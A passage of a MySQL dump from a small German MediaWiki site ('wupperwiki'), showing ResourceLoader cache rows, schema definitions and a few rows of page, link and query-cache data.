03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.postEdit:0b95b47274a3ac0ece0661a4e29fb35c','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.redirect:ece3b039c49f2e9d10602eb4b164c41b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.redirectPage:915eaede365283111270f903822ab5e7','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.action.view.rightClickEdit:58b727b7215c5675fa4e8e0cf78e778c','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api.category:77fb682a2b943ab5c1664b4f779d72aa','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api.edit:6b47d6df74a0c383e3f52ea3a47437a7','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api.login:63010c17ec831d3ca8669bd0b57de554','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api.parse:74282ca6a5aa0c6a928c662a3977b081','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api.watch:a7659c37d61712d607db31fb4cf47a2e','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.api:908e3d7dad0273dab234fb3cd35ae44f','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.cldr:da686d6015078bc8de1e6ed3ff41d028','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.content.json:72e1997cae6a0d81e0b9add03301d155','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.cookie:63ca2c6dc9505bfb143b212134b8e8cc','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.debug.init:36ae0e53a2df95b7619ed2c4a8fba203','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.debug:27e0642ce32255b17bf7bddd4f5ee7b2','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.feedback:49fc911125599b40e7fe6b0265b6f474','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.hidpi:2d8feca7c480ec951464d436f06e6560','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.hlist:cdb14d6e3fe68a6e0f5306e3524a6068','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.htmlform:62bc026b2ff90617613d4d9f3bc49711','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.icon:57d6a37146dc13bc6cc5d473c136d331','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.inspect:28c7c6c2af6bc8d495ba0ccb1505b86b','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.jqueryMsg:1e2733ce8c71480e23e675c9368bed9a','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.language.init:9ca5caf1fa2c0f3c5403b3bb4ca10c7b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.language.months:26e9cff554f6ce14b83a922cc8191165','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.language:36ff37f5ab5583d5e4e93a7c0398581d','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.ajax:889821b00edb4a6b679441750859de41','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.commonPrint:9e741915fa33c1fe2459a6e4b59ea7e7','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.config:e6ea7d12ecf5042bbb8684da906e62ed','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.oldshared:2f21894770fba0ecd809c055a0d0cdac','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.protect:cbf77bef7745ebe0d94b8995b05368fc','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.shared:d1b4f984b38a83fb169277b44023c0d0','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.legacy.wikibits:c5a6d909652a75f613ee8dffbb87baa6','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.libs.jpegmeta:21a217be65af92b7107f2408302c4f3c','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.libs.pluralruleparser:0c707bd7f10b8ef640c7625c3836653e','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.notification:30c39f7c48470f39fa2bb2a28bfe3045','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.notify:d839bc34bb630913c49b861ea0f5a567','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.gallery:8d76ff986d73020d4d1745e813263e0b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.image.pagination:2e669a78766667f23e4105b0978bd962','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.patrol.ajax:4772f1f52355bc15fc75c99d14998eec','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.ready:bfd7f0ba976bf51e2155de8e3ddb3c03','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.startup:e0703921aa72b5ba83c2c2ad6d2013a2','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.page.watch.ajax:913e829d58df1cec8a85f2e9f5e39999','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.pager.tablePager:b238b6c9c4f274151825d1d993e28115','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.searchSuggest:33194f8d2089c5fd2ecda1e63f87c3df','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.skinning.content.externallinks:616b68fc7ddb7431e34e03e460fa73dd','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.skinning.content.parsoid:77af45077036b30cb619524a887d1b39','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.skinning.content:7dba62db9320bffc5535acef1c550670','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.skinning.elements:10f269ba82b1c9803455ba558ae5163b','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.skinning.interface:312a3ecc968f756d7b194c91f9b54dfb','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.block:cb58e3f037909c0e0e3a00084384e4ed','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.changeemail:235bacf8543841bbac37d3feb6771872','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.changeslist.enhanced:e86f772b2543a2543581fdd583c606b8','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.changeslist.legend.js:89260b5ba07fc01eb517d42552fd2a23','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.changeslist.legend:adeae56509fdb25f407fdeea5bc70502','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.changeslist:cecc40546d85bdc33faf1b5a1bccfcb2','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.import:38699ab7cf7a19f227140e13e5eadf51','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.javaScriptTest:e90e192b8bf6dbaab843fce6ec351f54','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.movePage:e545f53f1405a7b593a895871fed2f37','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.pageLanguage:0a5bd29013dc514fa7c78550b41cce06','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.pagesWithProp:c0c120f73972668163ff470e186e3253','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.preferences:fc5b7c072c9ce40a976a790157b0b63d','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.recentchanges:4ab76df65c1c864722feadf1590185ba','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.search:4e67c5ffc84e96489607b539a076b7c5','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.undelete:307687a0f18f315a13cb1bf2e686c86b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.unwatchedPages:6d5f2d9685634d1d741e1a304f2cbc45','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.upload:8b90e9edc05163d71443bef1ac01808b','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.userlogin.common.js:20c4819944bd329c92484f6e65a3caf8','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.userlogin.common.styles:9fc019b18ccc03a636b37ef5aac81001','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.userlogin.login.styles:0f31d5c7deb390c7bb83cb8065b79cc2','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.userlogin.signup.js:f127e9751e45be3206be2ef9095725d0','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.userlogin.signup.styles:5f9f36675ab8836fa3fb1d5911eb216f','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special.version:89971d97512d147d8818cc58d515877a','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.special:b5923dafd96e0733e7f6155e675e0996','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.toc:3cf21017dced5793f1aa3099339b07e4','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.ui.anchor:9c5e0ee61e474f9980e57ce015e9dcb1','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.ui.button:6d88bec5fe2783d65582b83075dca340','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.ui.checkbox:8e1d8858a38a98f0614bfc9c385cb3ee','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.ui.input:4700317485e636d27afe7f5b5ccf1f03','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.ui:9f32bdeae9233b22bde1e49c668b58c2','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.user:23b27a7686f76c675b61efeaee9f2e37','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki.util:8e908c33f81f1b300237f598ec31f443','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:mediawiki:d8d94e42e06baf001d7a5c775e2e581f','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:moment:80277c2f1852ed882ce295979535d3fa','˴24160252\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:noscript:2994d21a8fa2a797ba72ba88acc9cd15','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:oojs-ui:36f75a564dfaef913c0902a4ca399963','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:oojs:9de36c1d8420101908ada2654fdd2120','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:site:43ad40d4e4083e86ae926529ede6d3ed','˴2416066165\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:site:ba0b81ae3d708d1c6ace4cb75b73df3b','˴241606616\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:site:e8be4f8f40d46304060b1160e664237a','˴241606610\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:site:f5578bb728f2e45aaa27bac2e4d958e0','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:skins.cologneblue:42058717706663392e09f459642790e6','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:skins.modern:d4e47a9059483322168583afda33b5bc','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:skins.monobook.styles:45a1eca30d3fc6af9da7dd5be28ea96c','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:skins.vector.js:b37727f497f9a851c5004f2dc19753b0','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:skins.vector.styles:828ed2f2bffceede946ff00a98104f6a','˴2416025270\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:user.groups:c29a8b505f52498e6fd834d1aca2cc41','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:moduledefinition:user:99f58c362d1c7acdb2df2e58ed4751af','˴241602524\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:mediawiki.action.edit.toolbar:fcd1417e3408a68161641185e8d6e2c0','\r \0]:A[\n:\r >HLϸ䊱=nbЋwG%܂( Ʀ55>p`^,^&4 ȑ3\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:mediawiki.language.data:368aa929bb26870d0d81d1d53f80a2e2',' \0]2A>j&=^<>xԠmv(S$&̹VDGO\\ =\\6mB\n|p','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:mediawiki.language.names:b1fb4c4c1e10c8fb972a86dfd612656c','I\n \0I.5qJ^<\n˻\n ]zj%=kpWG.W΋mm1\0Y|G','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:startup:04d32574437dbe927051115b185d5dc9',' 0 \0]2A6NSM\nBzwjdO\Z0&$ΤYPNzম~FYǽ\00\0','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:startup:1db0b2e08a51241a1615d7f7e3d0f133','M\n @ Ϭ4*Ew/ SA\Z&l@ē 6\n9X$c%y2{5J','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:startup:24af95d3154417bdae100a7f2ea881b5',' \0]2X5NQ݋ϔ]*\nրIzы`(\Z:gS¾g[sNyC~','2038-01-19 03:14:07'),('wupperwiki:resourceloader:modulemodifiedhash:startup:94d5a11606aca9a0e92c13470f8f444b','K\n0 <.Ļˁ Wé7uاIDYfnK/;Y[I`l]@','2038-01-19 03:14:07'); /*!40000 ALTER TABLE `objectcache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `oldimage` -- DROP TABLE IF EXISTS `oldimage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `oldimage` ( `oi_name` varbinary(255) NOT NULL DEFAULT '', `oi_archive_name` varbinary(255) NOT NULL DEFAULT '', `oi_size` int(10) unsigned NOT NULL DEFAULT '0', `oi_width` int(11) NOT NULL DEFAULT '0', `oi_height` int(11) NOT NULL DEFAULT '0', `oi_bits` int(11) NOT NULL DEFAULT '0', `oi_description` tinyblob NOT NULL, `oi_user` int(10) unsigned NOT NULL DEFAULT '0', `oi_user_text` varbinary(255) NOT NULL, `oi_timestamp` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `oi_metadata` mediumblob NOT NULL, `oi_media_type` enum('UNKNOWN','BITMAP','DRAWING','AUDIO','VIDEO','MULTIMEDIA','OFFICE','TEXT','EXECUTABLE','ARCHIVE') DEFAULT NULL, `oi_major_mime` enum('unknown','application','audio','image','text','video','message','model','multipart','chemical') DEFAULT NULL, `oi_minor_mime` varbinary(100) NOT NULL DEFAULT 'unknown', `oi_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', `oi_sha1` varbinary(32) NOT NULL DEFAULT '', KEY `oi_usertext_timestamp` (`oi_user_text`,`oi_timestamp`), KEY `oi_name_timestamp` (`oi_name`,`oi_timestamp`), KEY `oi_name_archive_name` (`oi_name`,`oi_archive_name`(14)), KEY `oi_sha1` (`oi_sha1`(10)) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `oldimage` -- LOCK TABLES `oldimage` WRITE; /*!40000 ALTER TABLE `oldimage` DISABLE KEYS */; /*!40000 ALTER TABLE `oldimage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `page` -- DROP TABLE IF EXISTS `page`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `page` ( `page_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `page_namespace` int(11) NOT NULL, `page_title` varbinary(255) NOT NULL, `page_restrictions` tinyblob NOT NULL, `page_counter` bigint(20) unsigned NOT NULL DEFAULT '0', `page_is_redirect` tinyint(3) unsigned NOT NULL DEFAULT '0', `page_is_new` tinyint(3) unsigned NOT NULL DEFAULT '0', `page_random` double unsigned NOT NULL, `page_touched` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `page_links_updated` varbinary(14) DEFAULT NULL, `page_latest` int(10) unsigned NOT NULL, `page_len` int(10) unsigned NOT NULL, `page_content_model` varbinary(32) DEFAULT NULL, `page_lang` varbinary(35) DEFAULT NULL, PRIMARY KEY (`page_id`), UNIQUE KEY `name_title` (`page_namespace`,`page_title`), KEY `page_random` (`page_random`), KEY `page_len` (`page_len`), KEY `page_redirect_namespace_len` (`page_is_redirect`,`page_namespace`,`page_len`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `page` -- LOCK TABLES `page` WRITE; /*!40000 ALTER TABLE `page` DISABLE KEYS */; INSERT INTO `page` VALUES (1,2,'Wikiadmin','',3,0,1,0.941892401561,'20150429051156','20150429051156',1,25,'wikitext',NULL),(2,4,'Über_WuppertalWiki','',17,0,0,0.759043196373,'20150430142946','20150430142946',13,474,'wikitext',NULL),(3,0,'Hauptseite','',128,0,0,0.381943007559,'20150430072550','20150430072550',11,76,'wikitext',NULL),(4,10,'FormatZahlLokal','',1,0,1,0.93896405069,'20150429193909','20150429193909',7,197,'wikitext',NULL),(5,10,'FormatZahl','',2,0,1,0.270600850448,'20150429194129','20150429194129',9,2331,'wikitext',NULL),(6,0,'WupperWiki:Starthilfe','',2,0,1,0.733749000787,'20150429194936','20150429194936',10,10289,'wikitext',NULL); /*!40000 ALTER TABLE `page` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `page_props` -- DROP TABLE IF EXISTS `page_props`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `page_props` ( `pp_page` int(11) NOT NULL, `pp_propname` varbinary(60) NOT NULL, `pp_value` blob NOT NULL, `pp_sortkey` float DEFAULT NULL, UNIQUE KEY `pp_page_propname` (`pp_page`,`pp_propname`), UNIQUE KEY `pp_propname_page` (`pp_propname`,`pp_page`), UNIQUE KEY `pp_propname_sortkey_page` (`pp_propname`,`pp_sortkey`,`pp_page`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `page_props` -- LOCK TABLES `page_props` WRITE; /*!40000 ALTER TABLE `page_props` DISABLE KEYS */; INSERT INTO `page_props` VALUES (6,'noeditsection','',NULL),(6,'notoc','',NULL); /*!40000 ALTER TABLE `page_props` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `page_restrictions` -- DROP TABLE IF EXISTS `page_restrictions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `page_restrictions` ( `pr_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `pr_page` int(11) NOT NULL, `pr_type` varbinary(60) NOT NULL, `pr_level` varbinary(60) NOT NULL, `pr_cascade` tinyint(4) NOT NULL, `pr_user` int(11) DEFAULT NULL, `pr_expiry` varbinary(14) DEFAULT NULL, PRIMARY KEY (`pr_id`), UNIQUE KEY `pr_pagetype` (`pr_page`,`pr_type`), KEY `pr_typelevel` (`pr_type`,`pr_level`), KEY `pr_level` (`pr_level`), KEY `pr_cascade` (`pr_cascade`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `page_restrictions` -- LOCK TABLES `page_restrictions` WRITE; /*!40000 ALTER TABLE `page_restrictions` DISABLE KEYS */; /*!40000 ALTER TABLE `page_restrictions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `pagelinks` -- DROP TABLE IF EXISTS `pagelinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pagelinks` ( `pl_from` int(10) unsigned NOT NULL DEFAULT '0', `pl_from_namespace` int(11) NOT NULL DEFAULT '0', `pl_namespace` int(11) NOT NULL DEFAULT '0', `pl_title` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `pl_from` (`pl_from`,`pl_namespace`,`pl_title`), UNIQUE KEY `pl_namespace` (`pl_namespace`,`pl_title`,`pl_from`), KEY `pl_backlinks_namespace` (`pl_namespace`,`pl_title`,`pl_from_namespace`,`pl_from`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `pagelinks` -- LOCK TABLES `pagelinks` WRITE; /*!40000 ALTER TABLE `pagelinks` DISABLE KEYS */; INSERT INTO `pagelinks` VALUES (6,0,0,'Wikipedia:Belege'),(6,0,0,'Wikipedia:Handbuch'),(6,0,0,'Wikipedia:Sei_mutig'),(6,0,0,'Wikipedia:Sei_tapfer'),(6,0,0,'Wikipedia:Spielwiese'),(6,0,0,'Wikipedia:Wikiquette'),(6,0,10,'/Zelle'),(4,10,10,'Dokumentation'),(5,10,10,'Dokumentation'),(6,0,10,'Shortcut'),(6,0,10,'Subpage'),(6,0,12,'Zusammenfassung_und_Quellen'); /*!40000 ALTER TABLE `pagelinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `protected_titles` -- DROP TABLE IF EXISTS `protected_titles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `protected_titles` ( `pt_namespace` int(11) NOT NULL, `pt_title` varbinary(255) NOT NULL, `pt_user` int(10) unsigned NOT NULL, `pt_reason` tinyblob, `pt_timestamp` binary(14) NOT NULL, `pt_expiry` varbinary(14) NOT NULL DEFAULT '', `pt_create_perm` varbinary(60) NOT NULL, UNIQUE KEY `pt_namespace_title` (`pt_namespace`,`pt_title`), KEY `pt_timestamp` (`pt_timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `protected_titles` -- LOCK TABLES `protected_titles` WRITE; /*!40000 ALTER TABLE `protected_titles` DISABLE KEYS */; /*!40000 ALTER TABLE `protected_titles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `querycache` -- DROP TABLE IF EXISTS `querycache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `querycache` ( `qc_type` varbinary(32) NOT NULL, `qc_value` int(10) unsigned NOT NULL DEFAULT '0', `qc_namespace` int(11) NOT NULL DEFAULT '0', `qc_title` varbinary(255) NOT NULL DEFAULT '', KEY `qc_type` (`qc_type`,`qc_value`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `querycache` -- LOCK TABLES `querycache` WRITE; /*!40000 ALTER TABLE `querycache` DISABLE KEYS */; /*!40000 ALTER TABLE `querycache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `querycache_info` -- DROP TABLE IF EXISTS `querycache_info`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `querycache_info` ( `qci_type` varbinary(32) NOT NULL DEFAULT '', `qci_timestamp` binary(14) NOT NULL DEFAULT '19700101000000', UNIQUE KEY `qci_type` (`qci_type`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `querycache_info` -- LOCK TABLES `querycache_info` WRITE; /*!40000 ALTER TABLE `querycache_info` DISABLE KEYS */; INSERT INTO `querycache_info` VALUES ('activeusers','20150429193746'); /*!40000 ALTER TABLE `querycache_info` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `querycachetwo` -- DROP TABLE IF EXISTS `querycachetwo`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `querycachetwo` ( `qcc_type` varbinary(32) NOT NULL, `qcc_value` int(10) unsigned NOT NULL DEFAULT '0', `qcc_namespace` int(11) NOT NULL DEFAULT '0', `qcc_title` varbinary(255) NOT NULL DEFAULT '', `qcc_namespacetwo` int(11) NOT NULL DEFAULT '0', `qcc_titletwo` varbinary(255) NOT NULL DEFAULT '', KEY `qcc_type` (`qcc_type`,`qcc_value`), KEY `qcc_title` (`qcc_type`,`qcc_namespace`,`qcc_title`), KEY `qcc_titletwo` (`qcc_type`,`qcc_namespacetwo`,`qcc_titletwo`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `querycachetwo` -- LOCK TABLES `querycachetwo` WRITE; /*!40000 ALTER TABLE `querycachetwo` DISABLE KEYS */; INSERT INTO `querycachetwo` VALUES ('activeusers',1430336072,2,'Wikiadmin',0,''); /*!40000 ALTER TABLE `querycachetwo` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `recentchanges` -- DROP TABLE IF EXISTS `recentchanges`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `recentchanges` ( `rc_id` int(11) NOT NULL AUTO_INCREMENT, `rc_timestamp` varbinary(14) NOT NULL DEFAULT '', `rc_user` int(10) unsigned NOT NULL DEFAULT '0', `rc_user_text` varbinary(255) NOT NULL, `rc_namespace` int(11) NOT NULL DEFAULT '0', `rc_title` varbinary(255) NOT NULL DEFAULT '', `rc_comment` varbinary(255) NOT NULL DEFAULT '', `rc_minor` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_bot` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_new` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_cur_id` int(10) unsigned NOT NULL DEFAULT '0', `rc_this_oldid` int(10) unsigned NOT NULL DEFAULT '0', `rc_last_oldid` int(10) unsigned NOT NULL DEFAULT '0', `rc_type` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_source` varbinary(16) NOT NULL DEFAULT '', `rc_patrolled` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_ip` varbinary(40) NOT NULL DEFAULT '', `rc_old_len` int(11) DEFAULT NULL, `rc_new_len` int(11) DEFAULT NULL, `rc_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', `rc_logid` int(10) unsigned NOT NULL DEFAULT '0', `rc_log_type` varbinary(255) DEFAULT NULL, `rc_log_action` varbinary(255) DEFAULT NULL, `rc_params` blob, PRIMARY KEY (`rc_id`), KEY `rc_timestamp` (`rc_timestamp`), KEY `rc_namespace_title` (`rc_namespace`,`rc_title`), KEY `rc_cur_id` (`rc_cur_id`), KEY `new_name_timestamp` (`rc_new`,`rc_namespace`,`rc_timestamp`), KEY `rc_ip` (`rc_ip`), KEY `rc_ns_usertext` (`rc_namespace`,`rc_user_text`), KEY `rc_user_text` (`rc_user_text`,`rc_timestamp`) ) 